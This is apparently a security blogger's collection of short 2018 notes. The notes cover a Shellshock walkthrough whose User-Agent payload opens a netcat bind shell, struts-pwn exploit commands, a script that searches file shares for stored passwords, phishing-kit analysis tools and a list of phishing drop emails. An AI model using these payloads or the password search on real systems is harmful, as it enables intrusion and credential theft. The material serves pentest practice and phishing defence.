Sunday, December 23, 2018

CVE-2014-6271 walk through

when practicing pen testing on CVE-2014-6271

Burp Suite proxy, repeater, modify user agent


GET / HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh

the repeater will not return because it's waiting for a connection now

open another prompt and launch netcat to connect to port 9999

nc xxx.xxx.xxx.xxx 9999

you are now at the /bin/sh prompt for the compromised system so you can type a command like

"whoami"

CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE

I found this github page extremely useful when practicing pen testing on CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE


https://github.com/mazen160/struts-pwn_CVE-2017-9805

Check if the vulnerability exists against a single URL.

python struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'

Exploit a single URL.

python struts-pwn.py --exploit --url 'http://example.com/struts2-rest-showcase/orders/3' -c 'touch /tmp/struts-pwn'

kali metasploit website auxillary modules



use auxiliary/scanner/http/dir_listing

use auxiliary/scanner/http/dir_scanner

use auxiliary/scanner/http/files_dir


list all nmap scripts available

to see all the nmap scripts available you can list out this directory

ls /usr/share/nmap/scripts/


vmware tools kali linux vmplayer

if you got kali linux and the vmware tools isn't working in vmplayer follow these instructions

http://www.vmwarearena.com/how-to-install-vmware-tools-on-kali-linux/

basically
1.) in vmplayer, manage -> install vmware tools
2.) open cd rom in kali
3.) copy .tar.gz to kali
4.) extract the .tar.gz
5.) run the vmware-install.pl
6.) choose all the defaults
7.) boom, vmware tools works again (like copy & paste to/from host)

dirbuster wordlist folder location

If you need a wordlist of directories for the dirbust tool they are located here on a default kali install

/usr/share/wordlists/dirbuster/


Saturday, December 22, 2018

apt-get update fails on Kali KEYEXPIRED

if

apt-get update

fails on Kali 

with an error like this

Get:1 http://kali.download/kali kali-rolling InRelease [30.5 kB]
Err:1 http://kali.download/kali kali-rolling InRelease
  The following signatures were invalid: KEYEXPIRED 1517583136  KEYEXPIRED 1517583136  KEYEXPIRED 1517583136  KEYEXPIRED 1517583136  KEYEXPIRED 1517583136
Fetched 30.5 kB in 8s (3,483 B/s)
Reading package lists... Done
W: An error occurred during the signature verification. The repository is not updated and the previous index files will be used. GPG error: http://kali.download/kali kali-rolling InRelease: The following signatures were invalid: KEYEXPIRED 1517583136  KEYEXPIRED 1517583136  KEYEXPIRED 1517583136  KEYEXPIRED 1517583136  KEYEXPIRED 1517583136
W: Failed to fetch http://http.kali.org/kali/dists/kali-rolling/InRelease  The following signatures were invalid: KEYEXPIRED 1517583136  KEYEXPIRED 1517583136  KEYEXPIRED 1517583136  KEYEXPIRED 1517583136  KEYEXPIRED 1517583136
W: Some index files failed to download. They have been ignored, or old ones used instead.


The fix appears to be these 2 commands that get new keys


wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2018.1_all.deb
apt install ./kali-archive-keyring_2018.1_all.deb

Thursday, December 20, 2018

Qradar API basics

This is where you can find documentation on your qradar api's instance

https://<your qradar url>/api_doc

this tells you about all the various api calls available

you can make calls directly in the browser if your credentials have permission by going to a url such as


https://<your qradar url>/api/siem/offenses



this older blog post gives you more details about connecting the 1st time

https://neonprimetime.blogspot.com/2016/01/qradar-siem-api-101-walk-through.html

py2exe does not work on python 3.6, use pyinstaller instead

py2exe does not work on python 3.6
use pyinstaller instead

py2exe throws this error
"IndexError: tuple index out of range"

so instead i get pyinstaller by doing this

> pip install pyinstaller

and then running

> pyinstaller.exe --onefile myscript.py

and it generates a working EXE

openFileShareWalker.py

# open file share searcher for passwords or restricted documents
import argparse
import os
import re

#definitions
suspiciousFileNames = r'(?i)(\.config|\.txt|\.ini|\.pdf|\.doc|\.xls|\.java|\.sql|\.vbs|\.inf|pwd|password)'
passwordSearchableFileNames = r'(?i)(\.config|\.txt|\.ini|\.java|\.sql|\.vbs|\.inf)'
passwordKeywords = r'(?i)(pwd|password|passwd|getConnection|connectionString)'
falsePositiveFolders = r'(?i)(EPO_REPOSITORY|VSCANDAT|AdaptivaCache|SmsPkg|DriverPkg)'
falsePositiveFileNames = r'(?i)(license|avvdat|uninst)'
suspiciousFiles = []
passwordFiles = []
fileCount = 0
progressInterval = 10000
progressTracker = progressInterval

#arguments
arguments = argparse.ArgumentParser("Search Open File Shares for passwords and restricted documents")
arguments.add_argument("-f", "--folder", type=str, required=True, help="Full UNC path (\\server\share) of open file share to search (note: file:// does not work)")
arguments.add_argument("-d", "--debug", action="store_true", required=False, help="Enable debugging messages")
arguments.add_argument("-p", "--progress", action="store_true", required=False, help="Enable progress tracking")
settings = arguments.parse_args()

#processing
if(settings.debug or settings.progress):
 print("starting walk of folder '{0}'".format(settings.folder))
for dname, dirs, files in os.walk(settings.folder):
 if(settings.debug):
  print("starting walk of sub-folder '{0}'".format(dname))
 for fname in files:
  fileCount = fileCount + 1
  fpath = os.path.join(dname, fname)
  if(settings.progress and fileCount >= progressTracker):
   print("PROGRESS: {0} files analyzed so far".format(str(fileCount)))
   progressTracker = progressTracker + progressInterval
  if(settings.debug):
   print("analyzing file '{0}'".format(fname))
  folderBadMatch = re.search(falsePositiveFolders, fpath)
  if(folderBadMatch is None):
   match = re.search(suspiciousFileNames, fname)
   if(match is not None):
    fileBadMatch = re.search(falsePositiveFileNames, fname)
    if(fileBadMatch is None):
     if(settings.debug):
      print("matched file '{0}'".format(fpath))
     suspiciousFiles.append(fpath)
  if(settings.debug):
   print("finished analyzing file '{0}'".format(fname))
 if(settings.debug):
  print("finished walk of sub-folder '{0}'".format(dname))
if(settings.debug):
 print("finished walk of folder '{0}'".format(settings.folder))
if(settings.debug or settings.progress):
 print("starting password searching")
for file in suspiciousFiles:
 isSearchable = re.search(passwordSearchableFileNames, file)
 if(isSearchable is not None):
  with open(file) as f:
   if(settings.debug):
    print("searching for passwords in '{0}'".format(file))
   for line in f:
    match = re.search(passwordKeywords, line)
    if(match is not None):
     passwordFiles.append((file, line))
if(settings.debug):
 print("finished password searching")

#output
for file in suspiciousFiles:
 print(file)
for (file, line) in passwordFiles:
 print("POSSIBLE PASSWORD in '{0}' [{1}]".format(file, line))

Wednesday, December 19, 2018

phishingKitTracker.py

# phishing kit parser, used to enrich kit and put into PhishingKitTracker csv format
# @neonprimetime
# https://github.com/neonprimetime/PhishingKitTracker/
import argparse
import zipfile
import urllib.request
from urllib.parse import urlparse
import os
from pathlib import Path
import re
from datetime import date
import hashlib
import shutil

#definitions
class PhishingKitTrackerEntry:
 date = date.today().strftime('%m/%d/%Y')
 reference = ""
 email = ""
 emailProvider = ""
 mailer = ""
 target = ""
 domain = ""
 zip = ""
 threatActor = ""
 md5 = ""
 url = ""
entries = []
proceed = 1
domain = ""
mailer = ""
filename = ""
md5 = ""
threatActor = ""
itemList = []
isUrls = 0
extractedfoldername = ""

#arguments
arguments = argparse.ArgumentParser("Analyze Phishing Kit, pass 1 url or file to start")
arguments.add_argument("-u", "--url", type=str, required=False, help="Url to a Phishing Kit Zip file")
arguments.add_argument("-f", "--file", type=str, required=False, help="Path to a Phishing Kit Zip file")
arguments.add_argument("-d", "--debug", action="store_true", required=False, help="Enable debugging messages")
arguments.add_argument("-r", "--reference", type=str, required=False, help="Twitter url referencing Phishing Kit")
arguments.add_argument("-l", "--listUrls", type=str, required=False, help="Path to file with a list of Urls to Phishing Kit Zip files in it 1 per line")
arguments.add_argument("-i", "--listFiles", type=str, required=False, help="Path to file with a list of Phishing Kit Zip files 1 per line")
settings = arguments.parse_args()
if(settings.url is None):
 if(settings.file is None):
  if(settings.listUrls is None):
   if(settings.listFiles is None):
    if(settings.debug):
     print("no url, file, or list param found")
    proceed = 0
    raise Exception("url (-u) or file (-f) or list (-l,-i) required")
   else:
    if(settings.debug):
     print("list of files param found '{0}'".format(settings.listFiles))
    with open(settings.listFiles) as f:
     for line in f:
      itemList.append(line.rstrip("\r\n"))
  else:
   if(settings.debug):
    print("list of urls param found '{0}'".format(settings.listUrls))
   with open(settings.listUrls) as f:
    for line in f:
     itemList.append(line.rstrip("\r\n"))
   isUrls = 1
 else:
  if(settings.debug):
   print("file param found'{0}'".format(settings.file))
  itemList.append(settings.file)
else:
 if(settings.debug):
  print("url param found '{0}'".format(settings.url))
 itemList.append(settings.url)
 isUrls = 1

#processing
if(proceed == 1):
 for item in itemList:
  if(isUrls == 0):
   filename = item
  else:
   try:
    url = urlparse(item)
    domain = url.netloc
    filename = os.path.basename(url.path)
    if(settings.debug):
     print("found domain '{0}'".format(domain))
     print("found filename '{0}'".format(filename))
    urllib.request.urlretrieve(item, filename)
    if(settings.debug):
     print("url downloaded '{0}'".format(item))
   except:
    print("failed to download '{0}'".format(item))
    continue
  extractedfoldername = str(Path(filename).with_suffix(""))
  if(settings.debug):
   print("getting file hash for '{0}'".format(filename))
  file = open(filename, 'rb')
  with file:
   md5 = hashlib.md5(file.read()).hexdigest()
  if(settings.debug):
   print("unzipping file '{0}' to '{1}'".format(filename,extractedfoldername))
  with zipfile.ZipFile(filename,'r') as zip_ref:
   zip_ref.extractall(extractedfoldername)
  if(settings.debug):
   print("file unzipped to '{0}'".format(extractedfoldername))
  if(settings.debug):
   print("starting search for Threat Actor Signatures")
  foundActor = 0
  for dname, dirs, files in os.walk(extractedfoldername):
   if(foundActor == 0):
    for fname in files:
     fpath = os.path.join(dname, fname)
     extension = os.path.splitext(fpath)[1]
     if(settings.debug):
      print("found file '{0}' with extension '{1}'".format(fpath,extension))
     if(extension is not None and extension == ".php"):
      if(settings.debug):
       print("searching file '{0}'".format(fpath))
      with open(fpath) as f:
       line = f.read()
       match = re.search(r'(?i)(created by|hacked by|coded by|edited by|signed by|made by)([^\r\n\=\+\"\'\,]+)\s+([\,\=\+\"\']|\-\-)', line)
       if(match is not None):
        threatActor = match.group(1) + match.group(2)
        foundActor = 1
        break
  if(settings.debug):
   print("finished search for Threat Actor Signatures")
  if(settings.debug):
   print("starting search for Threat Actor Emails")
  for dname, dirs, files in os.walk(extractedfoldername):
   for fname in files:
    fpath = os.path.join(dname, fname)
    mailer = os.path.basename(fpath)
    extension = os.path.splitext(fpath)[1]
    if(settings.debug):
     print("found file '{0}' with extension '{1}'".format(fpath,extension))
    if(extension is not None and extension == ".php"):
     if(settings.debug):
      print("searching file '{0}'".format(fpath))
     with open(fpath) as f:
      line = f.read()
      matches = re.findall(r'[\w\.-]+@[\w\.-]+', line)
      for match in matches:
       if(settings.debug):
        print("found threat actor email '{0}'".format(match))
       entry = PhishingKitTrackerEntry()
       if(settings.reference is not None):
        entry.reference = settings.reference
       entry.email = match
       entry.emailProvider = match.split('@')[1].split('.')[0]
       entry.mailer = mailer
       entry.domain = domain
       entry.zip = filename
       entry.threatActor = threatActor
       entry.md5 = md5
       if(isUrls == 1):
        entry.url = item
       entries.append(entry)
  if(settings.debug):
   print("deleting zip '{0}'".format(filename))
  if(filename is not None and filename != "" and ".zip" in filename):
   os.remove(filename)
  if(settings.debug):
   print("deleting folder '{0}'".format(extractedfoldername))
  if(extractedfoldername is not None and extractedfoldername != ""):
   shutil.rmtree(extractedfoldername, ignore_errors=True)
  if(settings.debug):
   print("finished search for Threat Actor Emails")
else:
 if(settings.debug):
  print("exiting program, proceed={0}".format(str(proceed)))


#output
for entry in entries:
 print("{0},{1},{2},{3},{4},{5},{6},{7},{8},{9},{10}".format(entry.date,entry.reference,entry.email,entry.emailProvider,entry.mailer,entry.target,entry.domain,entry.zip,entry.threatActor,entry.md5,entry.url))

Wednesday, December 12, 2018

regex extract zip, php, email from grep of phishingkit

after using this grep https://neonprimetime.blogspot.com/2018/12/grep-recursively-phishing-kit-zip-for.html in notepad++ you can regex out the zip name, php file name, and email address replace this \r\n([^\\]+)\\[^\r]+\\([^\\]+\.php)\:[^\r]+(\"|\')([^\"\'\r]+)(\"|\')[^\r]* with this \r\n\1,\2,\4

Monday, December 3, 2018

findstr recursively phishing kit zip for email

after unzipped findstr /S "@" *.php | findstr "$" | findstr "=" | findstr ";" | findstr "." | findstr /I /V "From" | findstr /I /V "headers" |findstr /I /V "function" | findstr /I /V "key" | findstr /I /V "indexOf" | findstr /I /V "class" | findstr /I /V "isset" | findstr /I /V "@date" | findstr /I /V "server" | findstr /I /V "http" | findstr /I /V "css" | findstr /I /V "style" | findstr /I /V "?" | findstr /I /V "@eval"

Saturday, December 1, 2018

grep recursively phishing kit zip for email

find email // $send = "bad@bad.com"; grep -r -P '\=\s*.([a-zA-Z][\w\_\.]{5,20})\@([a-zA-Z0-9.-]+)\.([a-zA-Z]{2,4})' | grep -v -P '(?i)(from|headers|array|messsage|find|domain)' // mail("bad@bad.com", ...) grep -r -P 'mail\([^\r\n]+\@' find who created it // ------ HACKED BY Somebody ---------- grep -r -P "(?i)(Created By|Hacked by|Coded by|Edited By|Signed by|Made by)" * | grep -v function

unzip all files to folder with same name

unzip files to a folder with the same name >ls abc.zip bob.zip test.zip >find . -name "*.zip" | while read filename; do unzip -o -d "`basename -s .zip "$filename"`" "$filename"; done; >ls abc abc.zip bob bob.zip test test.zip

wget -i Urls.txt

download a list of #phishingkit zips put files into urls.txt run command wget -i urls.txt

Friday, November 30, 2018

PhishingKitTracker by neonprimetime

community I've recorded the from each for the last year & started tracking them out on to share with you. My hope is this can somehow be used to fight the onslaught of seen daily See the list

https://github.com/neonprimetime/PhishingKitTracker/blob/master/PhishingKitTracker.csv

I have 500 phishing kits so far and the data paints some interesting pictures. Such as 82% of the phishing kits I tracked use a account to receive the stolen creds. I've also found threat actors that re-use so you can perhaps link together campaigns.

A big thank you, all the credit for the data goes to the community on twitter that hunts and finds all the evil sites such as and everyone else in the community

If anybody knows people , , , , that care about this type of data and could perhaps help the community start streamline reporting or detection of these email accounts that receive stolen creds daily that's be sweet.

If anybody knows a better place to upload zipped up phishing kits than VT , I'd love to be sharing and archiving them somewhere the whole community has access to.

If anybody every has threat actor emails they wanted appended to this list just CC me and I'll do my best to get them added

If anybody has suggestions on better ways to do this & share w/ the community, extra data/fields to track, etc. I'm all open ears, for example if somebody wanted to build a tracker website for the community to use you'd be my hero ! Otherwise, HAPPY FRIDAY

Wednesday, November 28, 2018

Excel SumIf example

=SUMIF(B2:B23, I2, F2:F23)

LogParser basic syntax

LogParser.exe -i:EVT -h       [prints the columns available on that event log type]

# Windows Auth (Security)
select where LogonType <> '3'
LogParser.exe -i:EVT "SELECT TimeGenerated as LoginTime,EXTRACT_TOKEN(Strings,5,'|') as username,EXTRACT_TOKEN(Strings, 8, '|') as LogonType,EXTRACT_TOKEN(Strings, 17, '|') AS ProcessName,EXTRACT_TOKEN(Strings, 18, '|') AS SourceIP FROM logs.evtx where EventID=4624 and EXTRACT_TOKEN(Strings, 8, '|') <> '3'"

# Windows Task Scheduler
LogParser.exe -i:EVT "SELECT EXTRACT_TOKEN(Strings, 0, '|') as TaskName, EXTRACT_TOKEN(Strings, 1, '|') as Path, EXTRACT_TOKEN(Strings, 2, '|') as ProcessId, EXTRACT_TOKEN(Strings, 3, '|') AS Priority FROM Microsoft-Windows-TaskScheduler%4Operational.evtx where EventID = 129 and EXTRACT_TOKEN(Strings, 1, '|') not like '%Sophos%' and EXTRACT_TOKEN(Strings, 1, '|') not like '%GoogleUpdate%' and EXTRACT_TOKEN(Strings, 0, '|') not like '%Database One%' and EXTRACT_TOKEN(Strings, 1, '|') not like '%Small Business%' and EXTRACT_TOKEN(Strings, 1, '|') not like '%Solutions BPA%'

LogParser.exe -i:EVT "select * from security.evtx" -rtp:-1

LogParser.exe -i:EVT "select * from security.evtx_ where eventid=4703" -rtp:-1

LogParser.exe -i:EVT "select eventid, count(*) from security.evtx_ group by eventid order by count(*) desc" -rtp:-1

LogParser.exe -i:EVT "select eventid, count(*) from security.evtx_ group by eventid order by count(*) desc"  -rtp:-1 -o:csv > out.csv

LogParser.exe -i:EVT "select timegenerated from system.evtx_ where message not like '%description for%' AND timegenerated >= '2018-11-26 05:00:00' and timegenerated <= '2018-11-26 18:00:00'"  -rtp:-1

LogParser.exe -i:EVT "select timegenerated, strings from security.evtx_ where strings not like '%privilege%'"  -rtp:-1 -o:csv > out.csv


NOTE:
The rtp parameter suppresses the "press a key" paging feature that is default for log parser
 -rtp:-1

NOTE:
If you get "The description for event id ... cannot be found" for every message it might be because

user account needs the"Manage auditing and security log." permission

Sunday, November 25, 2018

#phishingkit 10/2017 to 11/26/2018 from Twitter

Migrated this list to Github, future updates will be posted on github, not on this page

https://github.com/neonprimetime/PhishingKitTracker

-------------------

Search twitter for "#phishing kit email" thru 11/26/2018
Search twitter for "threat actor email" thru 11/26/2018
Search twitter for "phishing actor email" thru 11/26/2018
Search twitter for "kit email gmail" thru 11/26/2018

10/30/2017, https://twitter.com/WifiRumHam/status/925028684716789761, adamandeve10000@gmail.com, gmail, office.php, Office365, newmum.co.nz, authentication.zip ,
11/28/2017, https://twitter.com/dave_daves/status/935459029979226112, emailresult1000cc@gmail.com, gmail, ajax_php_file.php, Paypal, sucure-login-area-paypal.com-acces-dispute.ga, vuplodbank.zip ,
12/4/2017, https://twitter.com/dave_daves/status/937680046906597376, boxresult81@gmail.com, gmail, , ChaseBank, chase.com-secure.account.manpowergroupglobal.org, Chasebank.zip ,


12/14/2017, https://twitter.com/malware_traffic/status/941323414903644169, tingyangting111@gmail.com, gmail, , DHL, linkcomp.com.br, , , 
12/14/2017, https://twitter.com/malware_traffic/status/941323414903644169, johnbeng95@gmail.com, gmail, , DHL, linkcomp.com.br, , , 

12/22/2017, https://twitter.com/malware_traffic/status/944245891711586304, sharoncute48@gmail.com, gmail, , Office365, dhiprograme.tk, Office365.zip ,
12/22/2017, https://twitter.com/malware_traffic/status/944245891711586304, sharoncute48@gmail.com, gmail, , OneDrive, dhiprograme.tk, OneDrivenew.zip ,
12/22/2017, https://twitter.com/malware_traffic/status/944245891711586304, sharoncute48@gmail.com, gmail, , WhatsApp, dhiprograme.tk, webwhatsapp.zip ,

1/5/2018, https://twitter.com/neonprimetime/status/949347579938131969, mrtrqbing@gmail.com, gmail, , WellsFargo, grtrucking.net, WellsLINK.zip,
1/5/2018, https://twitter.com/neonprimetime/status/949409167328018437, frederickwsmith404@gmail.com, gmail, , http://u0000171.cp.regruhosting.ru, , , 
1/5/2018, https://twitter.com/neonprimetime/status/949409167328018437, randytessy17@gmail.com, gmail, , http://u0000171.cp.regruhosting.ru, , ,  1/5/2018, https://twitter.com/neonprimetime/status/949409167328018437, ericjasonminks150@gmail.com, gmail, , http://u0000171.cp.regruhosting.ru, , ,  1/5/2018, https://twitter.com/neonprimetime/status/949409167328018437, withgodblessed@gmail.com, gmail, , http://u0000171.cp.regruhosting.ru, , ,  1/5/2018, https://twitter.com/neonprimetime/status/949409167328018437, chingy555@gmail.com, gmail, , http://u0000171.cp.regruhosting.ru, , ,  1/5/2018, https://twitter.com/neonprimetime/status/949409167328018437, cleverin15@gmail.com, gmail, , http://u0000171.cp.regruhosting.ru, , ,  1/5/2018, https://twitter.com/neonprimetime/status/949409167328018437, susanfranciscoyason@gmail.com, gmail, , http://u0000171.cp.regruhosting.ru, , ,  1/5/2018, https://twitter.com/neonprimetime/status/949409167328018437, edu.logs1@gmail.com, gmail, , http://u0000171.cp.regruhosting.ru, , ,  1/5/2018, https://twitter.com/neonprimetime/status/949409167328018437, resultforwarding@gmail.com, gmail, , http://u0000171.cp.regruhosting.ru, , ,  1/5/2018, https://twitter.com/neonprimetime/status/949409167328018437, payagent008@gmail.com, gmail, , http://u0000171.cp.regruhosting.ru, , ,  1/5/2018, https://twitter.com/neonprimetime/status/949409167328018437, kmor1994@gmail.com, gmail, , http://u0000171.cp.regruhosting.ru, , ,  1/5/2018, https://twitter.com/neonprimetime/status/949409167328018437, jcgmaimi@gmail.com, gmail, , http://u0000171.cp.regruhosting.ru, , ,  1/5/2018, https://twitter.com/neonprimetime/status/949409167328018437, maharazuhussaini@gmail.com, gmail, , http://u0000171.cp.regruhosting.ru, , , 
1/6/2018, https://twitter.com/MaelSecurity/status/949740397093359617, resultargent11@gmail.com, gmail, , , , , , , 

1/9/2018, https://twitter.com/n0p1shing/status/950786753446760454,  pp.adamson12@gmail.com, gmail, , WellsFargo, leorose.org, wells.zip ,
1/23/2018, https://twitter.com/n0p1shing/status/955853608318365698, marvinrwilso@gmail.com, gmail, , ChaseBank, www.ybytymi.gov.py, ,
1/23/2018, https://twitter.com/n0p1shing/status/955860281770553344, sqlinjection9@gmail.com, gmail, , DropBox, www.escuelavaloresdivinos.com, ,
2/6/2018, https://twitter.com/malware_traffic/status/960885922874183681, ahmedbenhamida290@gmail.com, gmail, , Paypal, mypapyalservice.info.support.mlaitbd.com, Myaccount.zip, Shadow Z118

2/24/2018, https://twitter.com/FewAtoms/status/967395367515017216, goodgod950@gmail.com, gmail, , , itel.pt, , , 
2/24/2018, https://twitter.com/FewAtoms/status/967395367515017216, afonsojide007@gmail.com, gmail, , , itel.pt, , , 
2/24/2018, https://twitter.com/FewAtoms/status/967395367515017216, juve4n@gmail.com, gmail, , , itel.pt, , , 
2/24/2018, https://twitter.com/FewAtoms/status/967395367515017216, juve4n@yahoo.com, yahoo, , , itel.pt, , ,
2/26/2018, https://twitter.com/packet_Wire/status/968201542321963009, fabricshunter@gmail.com, gmail, , OneDrive, kimomwemotors.co.tz, , , 

3/18/2018, https://twitter.com/teoseller/status/975438207159500802, johnbeng95@gmail.com, gmail, , Hotmail, hectords.us, NEWHOT(2).zip, Created By Blessed E Moni
4/6/2018, https://twitter.com/Ring0x0/status/982367286085521408, fudtools@gmail.com, gmail, , Adobe, subashd.igg.biz, , Created BY unknown
4/6/2018, https://twitter.com/Ring0x0/status/982367286085521408, revkelvinsmith7@gmail.com, gmail, , Adobe, subashd.igg.biz, , Created BY unknown
4/11/2018, https://twitter.com/ps66uk/status/984215279856246784, ajcontractorllc@gmail.com, gmail, , Amazon, , , Created by Jokamer
4/13/2018, https://twitter.com/PhishingAi/status/984980235925016576, heavanmanner@gmail.com, gmail, verification.php, Gmail, www.ctworkerscomplaw.com, moole.zip,
4/13/2018, https://twitter.com/PhishingAi/status/984980235925016576, equallib12@gmail.com, gmail, verification.php, Gmail, www.ctworkerscomplaw.com, moole.zip,
4/17/2018, https://twitter.com/PhishingAi/status/986244030135787521, lee.ryan9713@gmail.com, gmail, , DropBox, safelinkonlineverify.com, dropbox Original Fin.zip,

4/17/2018, https://twitter.com/PhishingAi/status/986240791818326016, wirebox1oz@gmail.com, gmail, AA1.php, OneDrive, dewsdueshil.in.net, ZZmoh2.zip, , 

4/19/2018, https://twitter.com/ps66uk/status/986907477311672320, boltlogs111@gmail.com, gmail, , LinkedIn, livingthebalancedlife.com, linkedIn-1 (2).zip,
4/20/2018, https://twitter.com/PhishingAi/status/987371663661654016, x3dbase@gmail.com, gmail, , Microsoft, www.rmt.undip.ac.id, Hot-Latest.zip, Anonymous Cyber Team

4/28/2018, https://twitter.com/ViriBack/status/990270826674053121, jackthomas398@gmail.com, gmail, , Microsoft, sinfastener.com, HOTMAILverify.zip, , 

5/1/2018, https://twitter.com/PhishingAi/status/991381162663776256, mattajones2017.jones@yandex.com, yandex, base.php, btcw1, reaurobz.tk, bitcoin.zip,
5/1/2018, https://twitter.com/PhishingAi/status/991381162663776256, resultbox14@gmail.com, gmail, base.php, btcw1, reaurobz.tk, bitcoin.zip,
5/2/2018, https://twitter.com/phishingai/status/991678169517211649?s=21, jan.ddaley@gmail.com, gmail, , GoogleDrive, gossipservice.xyz, , ,
5/7/2018, https://twitter.com/PhishingAi/status/993481935455338497, bahijahgkayali@gmail.com, gmail, redirect.php, Alibaba, mobile.wellnuts.by, Alibaba.com.zip, created by n0b0dy
5/7/2018, https://twitter.com/PhishingAi/status/993488095042416641, vcman41121@gmail.com, gmail, , Excel, housingfinancecommission.com, Microsoftexcelverification000.zip, Created BY Unknown(doit)com
5/7/2018, https://twitter.com/PhishingAi/status/993530805535227904, uaelab39@gmail.com, gmail, , DropBox, impresoscolorca.com, mymail.zip, Created in 2018 By Lexxy
5/7/2018, https://twitter.com/PhishingAi/status/993530805535227904, unknownbnx@protonmail.com, protonmail, DropBox, impresoscolorca.com, mymail.zip, Created in 2018 By Lexxy
5/7/2018, https://twitter.com/malware_traffic/status/993635548874108929, craigsardoni10@gmail.com, gmail, , DocuSign, breakingbengal.com, docufix18.zip,
5/7/2018, https://twitter.com/PhishingAi/status/993658710974119936, alexpattyfar@gmail.com, gmail, , Adobe, outdoorlightingcorpuschristi.com, Adobe Latest 2017.zip, Created by fudpages(doit)com
5/8/2018, https://twitter.com/dave_daves/status/993801507387723776, lasomule5@gmail.com, gmail, ____3m4il____.php, AskAmex, americanexpress.com-app-requst.cf, amex2018.zip, J0hn l4mb0ng
5/8/2018, https://twitter.com/malware_traffic/status/993865209570881537, princepepsa241@gmail.com, gmail, , Adobe, cre8tivehost.com, newpdf.com.zip, Alibobo
5/14/2018, https://twitter.com/malware_traffic/status/996086966314659841, reyg4hunnid@gmail.com, gmail, , OneDrive, jade-lang.bid, Onedrive.zip, MerLin

5/17/2018, https://twitter.com/phishingai/status/997260699867824128?s=21, comingthrough01@gmail.com, gmail, , GoogleDocs, advantageinspections4you.com, , ,
5/22/2018, https://twitter.com/phishingai/status/998958797115670528?s=21, servergroupbd@gmail.com, gmail, , , , , ,
5/22/2018, https://twitter.com/phishingai/status/999000244862926848?s=21, alexnormal350@gmail.com, gmail, , Adobe, styleadvisor.net, , ,
5/22/2018, https://twitter.com/phishingai/status/999021183109484544?s=21, ceo2blessing4jasman@gmail.com, gmail, , Microsoft, blamefind.cf, , ,
5/22/2018, https://twitter.com/phishingai/status/999022618689720320?s=21, howardrosell4@gmail.com, gmail, , Adobe, classykcatering.com, , ,
5/22/2018, https://twitter.com/phishingai/status/999107530629394432?s=21, turtleromeoo@gmail.com, gmail, , DocuSign, www.allangillphotography.com, , ,

5/24/2018, https://twitter.com/ps66uk/status/1000133999736520705, m.s411x@zoho.com, zoho, , , gonenative.com.au, validate.zip, HACKED BY OPIO
5/24/2018, https://twitter.com/ps66uk/status/1000133999736520705, lolly4u2luv@gmail.com, gmail, , , gonenative.com.au, validate.zip, HACKED BY OPIO
5/28/2018, https://twitter.com/PhishingAi/status/1001137137365012481, markenzy2018@gmail.com, gmail, , Docusign, pdfdocusign.com, mkdhysyhh.zip,
6/1/2018, https://twitter.com/PhishingAi/status/1002608731236864000, peter2035@gmail.com, gmail, , OneDrive, tinyflocks45.ml, one.drive new.zip,

6/1/2018, https://twitter.com/nullcookies/status/1002577476755828736, emmanuelegbejale@gmail.com, gmail, , Avast, slotfire.bid, , , MrEmmZ

6/19/2018, https://twitter.com/ps66uk/status/1009213271587639296, peralgems.sxm@gmail.com, gmail, , NatWest, www.photoexpression.com, modle.zip,
6/21/2018, https://twitter.com/JonSelman/status/1009860110280286209, blackshop.tools@gmail.com, gmail, processor.php, Microsoft, rayanehh.club, Microsoft auto.zip, 
7/5/2018, https://twitter.com/ps66uk/status/1014872544778833920, xoxobillionaire@gmail.com, gmail, zVeXn5.php, Office365, jobs.finddynamic.com, invoice.zip, 

7/12/2018, https://twitter.com/sS55752750/status/1017500841794732034, surelogin2@gmail.com, gmail, , BOA, www.soceron.org.br, , 
7/15/2018, https://twitter.com/nullcookies/status/1018598506511130624, jim.isaac2121@gmail.com, gmail, , Citi, www.contrasa.com.gt, , , 

7/19/2018, https://twitter.com/demonslay335/status/1019982348429996033, hollandmelt@gmail.com, gmail, validation.php, DocuSign, modermdesigec.ga, mankmodern.zip, , 

7/23/2018, https://twitter.com/nullcookies/status/1021586396967051265, foxinsurrance@gmail.com, gmail, , Mimecast, touchmeup.operand.com, , , 
7/23/2018, https://twitter.com/nullcookies/status/1021586396967051265, dddresult@gmail.com, gmail, , Mimecast, touchmeup.operand.com, , , 

7/24/2018, https://twitter.com/dave_daves/status/1021729264532635648, michaelnlisa4sure@gmail.com, gmail, , BOA, bofamerica-login-index-com.gq, bnd.zip, Dr.Don
7/24/2018, https://twitter.com/dave_daves/status/1021729264532635648, sesurityas@yandex.com, yandex, , BOA, bofamerica-login-index-com.gq, bnd.zip, Dr.Don

8/1/2018, https://twitter.com/PhishingAi/status/1024738507225526272, evansjohnny40@gmail.com, gmail, result.php, Comcast, login.comcast.net.support.rooseveltpark.co.za, x2.zip, Modsrule

8/3/2018, https://twitter.com/dms1899/status/1025298743548100608?s=21, resultsze@gmail.com, gmail, , Bred_BP, to-pettey-to.gq, , , 

8/6/2018, https://twitter.com/phishingai/status/1026462447207677953?s=21, citijuug@protonmail.com, protonmail, , HMRCgovuk, www.hmrc-gov-uk.online, , , 
8/6/2018, https://twitter.com/phishingai/status/1026462447207677953?s=21, rickyflair@protonmail.com, protonmail, , HMRCgovuk, www.hmrc-gov-uk.online, , , 

8/6/2018, https://twitter.com/PhishingAi/status/1026286635879522304, herren.ruth@gmail.com, gmail, next2.php, Microsoft, www.secure-officequotaupdate-emicrosoftonline.shoppersfact.com, quotaview.zip, nJoy
8/22/2018, https://twitter.com/ps66uk/status/1032284023559737346, cmx_th@yahoo.com, yahoo, , Microsoft, premierstl.com, , , 


9/8/2018, https://twitter.com/jcybersec_/status/1038626145443479553?s=21, mikemark78@yandex.com, yandex, , DocuSign, khatnayhoye.com, , , 

9/19/2018, https://twitter.com/dave_daves/status/1042410483934945280, logmoney101@gmail.com, gmail, , DHL, http.dhl.com.verification.location.com.grundy-feeu-wamdoct.xyz, hppdhlnetwor -.zip, HACKED BY CARISLAMBA

10/2/2018, https://twitter.com/neonprimetime/status/1047304213578088448, rachid.ttm.ttm@gmail.com, gmail, , Stripe, peregrinosdequeretaroaltepeyac.org, Stripebank.zip, , 

